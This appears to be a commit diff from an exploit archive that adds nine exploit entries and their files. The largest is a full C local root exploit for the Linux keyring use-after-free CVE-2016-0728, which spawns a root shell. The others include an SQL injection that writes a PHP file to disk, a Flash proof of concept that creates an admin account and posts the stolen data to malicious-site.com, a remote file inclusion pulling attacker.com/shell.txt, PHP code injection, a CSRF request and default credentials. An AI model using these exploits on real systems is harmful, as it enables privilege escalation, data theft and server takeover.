DB: 2016-01-20

9 new exploits

files.csv

@@ -31234,7 +31234,7 @@ id,file,description,date,author,platform,type,port
 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
 34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
 34667,platforms/linux/shellcode/34667.c,"Connect Back (139 bytes)",2014-09-15,MadMouse,linux,shellcode,0
-34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
+34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80
 34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
@@ -35414,7 +35414,7 @@ id,file,description,date,author,platform,type,port
 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
-39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
+39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0
 39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
 39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0
@@ -35510,3 +35510,12 @@ id,file,description,date,author,platform,type,port
 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443
+39267,platforms/php/webapps/39267.html,"Ilya Birman E2 '/@actions/comment-process' SQL Injection Vulnerability",2014-07-23,"High-Tech Bridge",php,webapps,0
+39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default 'crossdomain.xml' Security Bypass Vulnerability",2014-07-23,"Seth Art",php,webapps,0
+39269,platforms/php/webapps/39269.txt,"WordPress Lead Octopus Power 'id' Parameter SQL Injection Vulnerability",2014-07-28,Amirh03in,php,webapps,0
+39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress options-general.php Option Manipulation CSRF",2014-07-28,"Dylan Irzi",php,webapps,0
+39271,platforms/php/webapps/39271.txt,"CMSimple Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
+39272,platforms/php/webapps/39272.txt,"CMSimple Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
+39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
+39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
+39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0

platforms/linux/local/39277.c

@@ -0,0 +1,217 @@
+# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
+# Date: 19/1/2016
+# Exploit Author: Perception Point Team
+# CVE : CVE-2016-0728
+
+/* CVE-2016-0728 local root exploit
+    modified by Federico Bento to read kernel symbols from /proc/kallsyms
+    props to grsecurity/PaX for preventing this in so many ways
+
+    $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
+    $ ./cve_2016_072 PP_KEY */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <keyutils.h>
+#include <unistd.h>
+#include <time.h>
+#include <unistd.h>
+
+#include <sys/ipc.h>
+#include <sys/msg.h>
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (*  
+_prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+
+#define STRUCT_LEN (0xb8 - 0x30)
+#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
+#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
+
+
+
+struct key_type {
+	char * name;
+     	size_t datalen;
+     	void * vet_description;
+     	void * preparse;
+     	void * free_preparse;
+     	void * instantiate;
+     	void * update;
+     	void * match_preparse;
+     	void * match_free;
+     	void * revoke;
+     	void * destroy;
+};
+
+/* thanks spender - Federico Bento */
+static unsigned long get_kernel_sym(char *name)
+{
+	FILE *f;
+	unsigned long addr;
+	char dummy;
+	char sname[256];
+	int ret;
+
+	f = fopen("/proc/kallsyms", "r");
+	if (f == NULL) {
+		fprintf(stdout, "Unable to obtain symbol listing!\n");
+		exit(0);
+	}
+
+	ret = 0;
+	while(ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	return 0;
+}
+
+void userspace_revoke(void * key) {
+     	commit_creds(prepare_kernel_cred(0));
+}
+
+int main(int argc, const char *argv[]) {
+	const char *keyring_name;
+	size_t i = 0;
+         unsigned long int l = 0x100000000/2;
+	key_serial_t serial = -1;
+	pid_t pid = -1;
+         struct key_type * my_key_type = NULL;
+
+         struct {
+		long mtype;
+		char mtext[STRUCT_LEN];
+	} msg = {0x4141414141414141, {0}};
+	int msqid;
+
+	if (argc != 2) {
+		puts("usage: ./keys <key_name>");
+		return 1;
+	}
+
+     	printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
+	commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
+     	prepare_kernel_cred =  
+(_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
+	if(commit_creds == NULL || prepare_kernel_cred == NULL) {
+		commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
+                 prepare_kernel_cred =  
+(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
+                 if(commit_creds == (_commit_creds)0xffffffff810bb050  
+|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
+                 	puts("[-] You probably need to change the address of  
+commit_creds and prepare_kernel_cred in source");
+	}
+
+     	my_key_type = malloc(sizeof(*my_key_type));
+
+     	my_key_type->revoke = (void*)userspace_revoke;
+     	memset(msg.mtext, 'A', sizeof(msg.mtext));
+
+     	// key->uid
+     	*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
+     	//key->perm
+     	*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
+
+     	//key->type
+     	*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
+
+     	if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
+        		perror("msgget");
+         	exit(1);
+     	}
+
+     	keyring_name = argv[1];
+
+	/* Set the new session keyring before we start */
+
+	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
+	if (serial < 0) {
+		perror("keyctl");
+		return -1;
+     	}
+
+	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL |  
+KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
+		perror("keyctl");
+		return -1;
+	}
+
+
+	puts("[+] Increfing...");
+     	for (i = 1; i < 0xfffffffd; i++) {
+         	if (i == (0xffffffff - l)) {
+            		l = l/2;
+             		sleep(5);
+         	}
+         	if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
+             		perror("[-] keyctl");
+             		return -1;
+         	}
+     	}
+     	sleep(5);
+     	/* here we are going to leak the last references to overflow */
+     	for (i=0; i<5; ++i) {
+         	if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
+             		perror("[-] keyctl");
+             		return -1;
+         	}
+     	}
+
+     	puts("[+] Finished increfing");
+     	puts("[+] Forking...");
+     	/* allocate msg struct in the kernel rewriting the freed keyring  
+object */
+     	for (i=0; i<64; i++) {
+         	pid = fork();
+         	if (pid == -1) {
+             		perror("[-] fork");
+             		return -1;
+         	}
+
+         	if (pid == 0) {
+             		sleep(2);
+             		if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
+                 		perror("[-] msgget");
+                 		exit(1);
+             		}
+             		for (i = 0; i < 64; i++) {
+                 		if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
+                     			perror("[-] msgsnd");
+                     			exit(1);
+                 		}
+             		}
+             		sleep(-1);
+             		exit(1);
+         	}
+     	}
+
+     	puts("[+] Finished forking");
+     	sleep(5);
+
+     	/* call userspace_revoke from kernel */
+     	puts("[+] Caling revoke...");
+     	if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
+         	perror("[+] keyctl_revoke");
+     	}
+
+     	printf("uid=%d, euid=%d\n", getuid(), geteuid());
+     	execl("/bin/sh", "/bin/sh", NULL);
+
+     	return 0;
+}

platforms/php/webapps/39267.html

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/68843/info
+
+Ilya Birman E2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+E2 v2844 is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/@actions/comment-process" method="post" name="main">
+<input type="hidden" name="already-subscribed" value="">
+<input type="hidden" name="comment-id" value="new">
+<input type="hidden" name="elton-john" value="1">
+<input type="hidden" name="email" value="mail@mail.com">
+<input type="hidden" name="from" value="">
+<input type="hidden" name="name" value="name">
+<input type="hidden" name="subscribe" value="on">
+<input type="hidden" name="text" value="1">
+<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
+<input type="submit" id="btn">
+</form>

platforms/php/webapps/39268.java

@@ -0,0 +1,55 @@
+source: http://www.securityfocus.com/bid/68866/info
+
+UniFi Video is prone to a security-bypass vulnerability.
+
+An authenticated attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.
+
+UniFi Video 2.1.3 is vulnerable; other versions may also be affected. 
+
+// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
+// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
+// POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit)
+package {
+ import flash.display.Sprite;
+ import flash.events.*;
+ import flash.net.URLRequestMethod;
+ import flash.net.URLRequest;
+ import flash.net.URLLoader;
+ import flash.net.URLRequestHeader;
+
+ public class XDomainXploit3 extends Sprite {
+  public function XDomainXploit3() {
+   // Target URL from where the data is to be retrieved
+   var readFrom:String = "https//www.example.com:7443/api/2.0/admin";
+   var header:URLRequestHeader = new URLRequestHeader("Content-Type",
+"text/plain; charset=UTF-8");
+   var readRequest:URLRequest = new URLRequest(readFrom);
+   readRequest.method = URLRequestMethod.POST
+   readRequest.data =
+"{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
+   readRequest.requestHeaders.push(header);
+   var getLoader:URLLoader = new URLLoader();
+   getLoader.addEventListener(Event.COMPLETE, eventHandler);
+   try {
+    getLoader.load(readRequest);
+   } catch (error:Error) {
+    trace("Error loading URL: " + error);
+   }
+  }
+
+
+  private function eventHandler(event:Event):void {
+   // URL to which retrieved data is to be sent
+   var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php"
+   var sendRequest:URLRequest = new URLRequest(sendTo);
+   sendRequest.method = URLRequestMethod.POST;
+   sendRequest.data = event.target.data;
+   var sendLoader:URLLoader = new URLLoader();
+   try {
+    sendLoader.load(sendRequest);
+   } catch (error:Error) {
+    trace("Error loading URL: " + error);
+   }
+  }
+ }
+}

platforms/php/webapps/39269.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/68934/info
+
+The Lead Octopus Power plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL] 

platforms/php/webapps/39270.txt

@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/68954/info
+
+WhyDoWork AdSense plugin for WordPress is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or perform unauthorized actions. Other attacks may also be possible.
+
+WhyDoWork AdSense plugin 1.2 and prior are vulnerable. 
+
+POST URL:
+http://www.example.com/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1
+Host: www.example.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101
+Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-co
+Accept-Encoding: gzip, deflate
+Referer:
+http://www.example.com/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1
+Cookie:
+wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=hacking%7C1406766762%7C0a0ccdb16a9d99c2b9113e25e2ea6b8d;
+wp-settings-time-1=1406489836;
+wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=loreleitaron%7C1406766762%7C667e59a36d4254c8a178580770ac5135
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 843
+
+CONTENIDO POST:
+idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update
+

platforms/php/webapps/39271.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/68961/info
+
+CMSimple is prone to multiple security vulnerabilities including:
+
+1. Multiple arbitrary PHP code-execution vulnerabilities
+2. A weak authentication security-bypass vulnerability
+3. Multiple security vulnerabilities
+
+An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 
+
+Any user can login just with simple password "test" which is the default cms password & there own vendor site is vulnerable with weak authentication 
+just login without user name & also with default password "test" here "http://cmsimple.org/2author/?Welcome_to_CMSimple&login"

platforms/php/webapps/39272.txt

@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/68961/info
+ 
+CMSimple is prone to multiple security vulnerabilities including:
+ 
+1. Multiple arbitrary PHP code-execution vulnerabilities
+2. A weak authentication security-bypass vulnerability
+3. Multiple security vulnerabilities
+ 
+An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 
+
+vulnerable file "http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php"
+
+Vulnerable Code :
+-----------------------------------vulnerable Code----------------------------------------
+
+        require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
+        require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';
+
+exploit Code :
+-------------------------------------PoC----------------------------------------
+
+http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?
+
+also embedded These files :
+    CMSimple/2lang/index.php
+    CMSimple/2site/index.php
+    CMSimple/cmsimple/cms.php
+    CMSimple/index.php
+    CMSimple/plugins/index.php
+  

platforms/php/webapps/39273.txt

@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/68961/info
+  
+CMSimple is prone to multiple security vulnerabilities including:
+  
+1. Multiple arbitrary PHP code-execution vulnerabilities
+2. A weak authentication security-bypass vulnerability
+3. Multiple security vulnerabilities
+  
+An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 
+
+vulnerable file "http://www.example.com/CMSimple/2author/index.php" 
+
+An attacker might execute arbitrary PHP code with this vulnerability. User tainted data is embedded into a function that compiles PHP code on the run and executes it thus allowing an attacker to inject own PHP code that will be executed. 
+This vulnerability can lead to full server compromise.
+
+Vulnerable Code:
+-------------------------------------vulnerable code---------------------------------------
+    1320: preg_replace $c[$s] = preg_replace($words, '<span style="background: ' . $cmsimple_highlight_bg . '; color: ' . $cmsimple_highlight_tx . ';">\\0</span>', $c[$s]);  // functions.php
+        1316: $words = array_map(create_function('$w', 'return "&".$w."(?!([^<]+)?>)&isU";'), $words);  // functions.php
+            1315: $words = explode(',', urldecode($_GET['search']));  // functions.php
+        1308:  function content($cmsimple_highlight_bg = NULL, $cmsimple_highlight_tx = NULL)
+        1308:  function content($cmsimple_highlight_bg = NULL, $cmsimple_highlight_tx = NULL)
+--------------------------------------vulnerable Code---------------------------------------
+    1324: preg_replace $c[$s] = preg_replace($words, '<span class="highlight_search">\\0</span>', $c[$s]);  // functions.php
+        1316: $words = array_map(create_function('$w', 'return "&".$w."(?!([^<]+)?>)&isU";'), $words);  // functions.php
+            1315: $words = explode(',', urldecode($_GET['search']));  // functions.php
+    
+
+
+
+-------------------------------PoC:------------------------------ 
+http://www.example.com/CMSimple/2author/index.php?color=';phpinfo();//
+
+also effect these files :
+    CMSimple/2lang/index.php
+    CMSimple/2site/index.php
+    CMSimple/2site2lang/index.php
+    CMSimple/cmsimple/cms.php
+    CMSimple/cmsimple/functions.php
+    CMSimple/index.php

platforms/windows/dos/39275.txt

@@ -0,0 +1,54 @@
+########################################################################################
+
+# Title: PDF-XChange Viewer - Shading Type 7 Heap Memory Corruption 
+# Application: PDF-XChange Viewer
+# Version 2.5.315.0
+# Platform: Windows
+# Software Link: http://www.tracker-software.com/
+# Date: 2015-11-15
+# Author: Sébastien Morin from COSIG
+# Contact: https://twitter.com/COSIG_ (@COSIG_)
+# Personal contact: https://twitter.com/SebMorin1 (@SebMorin1)
+
+########################################################################################
+
+===================
+Introduction:
+===================
+
+PDF-XChange Viewer is a proprietary PDF reader for Microsoft Windows available for free. The basic reader, which can be downloaded free of charge, includes extended/markup capabilities such as typing, highlighting, callouts, and notes. Another useful feature is its ability to display PDF files in the "preview" pane of the Windows Explorer without locking the file (and thus allowing for easy setting of metadata info). An advanced paid version is also available.
+(https://en.wikipedia.org/wiki/PDF-XChange_Viewer)
+
+########################################################################################
+
+===================
+Report Timeline:
+===================
+
+2015-11-15 Sébastien Morin from COSIG found the vulnerability;
+2015-11-16 Sébastien Morin from COSIG report the vulnerability to vendor;
+2015-11-16 Vendor fixed the issue;
+2016-01-18 Vendor released fixed version of PDF-XChange Viewer (version 2.5.316.1)
+2016-01-18 Advisory Release
+
+
+########################################################################################
+
+===================
+Technical details:
+===================
+
+A heap memory corruption occurs when PDF-XChange Viewer handle a invalid Shading Type 7 stream.
+
+An attacker can leverage this vulnerability to potentially execute arbitrary code on vulnerable installations of PDF-XChange Viewer.
+
+########################################################################################
+
+==========
+POC:
+==========
+
+https://smsecurity.net/pdf-xchange-viewer-shading-type-7-heap-memory-corruption/
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39275.zip
+
+########################################################################################